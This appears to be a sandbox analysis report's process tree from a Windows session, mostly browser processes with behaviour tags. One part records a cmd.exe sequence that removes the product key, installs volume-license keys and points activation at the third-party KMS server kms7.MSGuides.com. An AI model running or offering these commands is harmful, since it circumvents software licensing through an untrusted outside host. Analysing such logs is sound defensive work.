C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7348 /prefetch:82⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=193 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10680 /prefetch:12⤵PID:7784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=194 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:6984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=195 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11368 /prefetch:12⤵PID:6432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=196 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:12⤵PID:6020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=197 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12188 /prefetch:12⤵PID:7288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=198 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:12⤵PID:8764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=199 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:12⤵PID:8768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=200 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11072 /prefetch:12⤵PID:5200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=201 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12092 /prefetch:12⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=202 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:12⤵PID:5084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=204 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10960 /prefetch:12⤵PID:2892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=206 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9660 /prefetch:12⤵PID:8592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11008 /prefetch:82⤵PID:5592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=208 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:12⤵PID:7784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=209 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:12⤵PID:6324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=210 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12124 /prefetch:12⤵PID:6788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=211 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:12⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=212 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:12⤵PID:9148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=213 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:12⤵PID:8704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=215 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:12⤵PID:8120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:82⤵PID:736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=218 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=219 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:12⤵PID:8096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=220 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1292 /prefetch:12⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=221 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:12⤵PID:6820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=222 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:12⤵PID:7264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=223 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵PID:7072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=224 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:12⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=225 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:12⤵PID:7472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=226 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11380 /prefetch:12⤵PID:2408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=227 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9852 /prefetch:12⤵PID:8992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=229 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:82⤵PID:8800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:82⤵PID:8792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=233 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:552
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2588
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5460
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5936 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8bd0bcc40,0x7ff8bd0bcc4c,0x7ff8bd0bcc582⤵PID:5920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2024,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2016 /prefetch:22⤵PID:6072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2560 /prefetch:32⤵PID:3596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2140,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2680 /prefetch:82⤵PID:1756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:12⤵PID:5720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:12⤵PID:744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3716,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:12⤵PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3696,i,5978691574281601850,10267787999293721083,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3816 /prefetch:12⤵PID:4420
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3724
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x504 0x2f81⤵PID:4808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} -Embedding1⤵PID:2448
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:5816
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ckms2⤵PID:1156
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /upk2⤵PID:5188
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /cpky2⤵PID:5680
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\system32\findstr.exefindstr /I "enterprise"2⤵PID:2612
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ipk DPH2V-TTNVB-4X9Q3-TJR4H-KHJW42⤵PID:180
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ipk WNMTR-4C88C-JK8YV-HQ7T2-76DF92⤵PID:1012
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ipk 2F77B-TNFGY-69QQF-B8YKP-D69TJ2⤵PID:5580
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ipk DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ2⤵PID:2900
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ipk QFFDN-GRT3P-VKWWX-X7T3R-8B6392⤵PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" goto server) else wmic os "2⤵PID:1528
-
-
C:\Windows\system32\findstr.exefindstr /I "home"2⤵PID:4364
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
-
C:\Windows\system32\findstr.exefindstr /I "education"2⤵PID:2512
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ipk 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ2⤵PID:4440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" goto server) else wmic os "2⤵PID:5564
-
-
C:\Windows\system32\findstr.exefindstr /I "10 pro"2⤵PID:2584
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /skms kms7.MSGuides.com:16882⤵PID:4352
-
-
C:\Windows\system32\cscript.execscript //nologo slmgr.vbs /ato2⤵PID:5412
-
-
C:\Windows\system32\find.exefind /i "successfully"2⤵PID:4136
-
-
C:\Windows\explorer.exeexplorer "http://MSGuides.com"2⤵PID:4912
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2480
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://msguides.com/2⤵PID:812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47183⤵PID:4896
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5788 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMwODBGMDItQkRCNi00QjVCLTk0RkUtNEJCQjQwREJFRDJGfSIgdXNlcmlkPSJ7QTlDREFDNTMtOENDRS00QzdGLTk3RjgtRDU2NUYwMjA5Q0M2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QzU4NjY2MkEtNDRGMy00Njk4LUI5OTctRkJERkU2RUJBQTFDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O2NCWUVZWDg3MXRzR3VLSmFvNjNYalV0NXZKRTlYeENUbkU3SDBQZ1VqS0U9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1OCIgaW5zdGFsbGRhdGV0aW1lPSIxNzI4MjkzNDAwIiBvb2JlX2luc3RhbGxfdGltZT0iMTMzNzI3NjYwNzU2NjEwMDAwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjE3OTg2MiIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzM4Njk5NzQ5MSIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:6028
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\MicrosoftEdge_X64_131.0.2903.70.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\MicrosoftEdge_X64_131.0.2903.70.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵
- Executes dropped EXE
PID:4784 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\EDGEMITMP_B6219.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\EDGEMITMP_B6219.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\MicrosoftEdge_X64_131.0.2903.70.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5080 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\EDGEMITMP_B6219.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\EDGEMITMP_B6219.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8FFE521A-1CA0-481F-AA83-370889DD676B}\EDGEMITMP_B6219.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff75eef2918,0x7ff75eef2924,0x7ff75eef29304⤵
- Executes dropped EXE
PID:3480
-
-
-
-
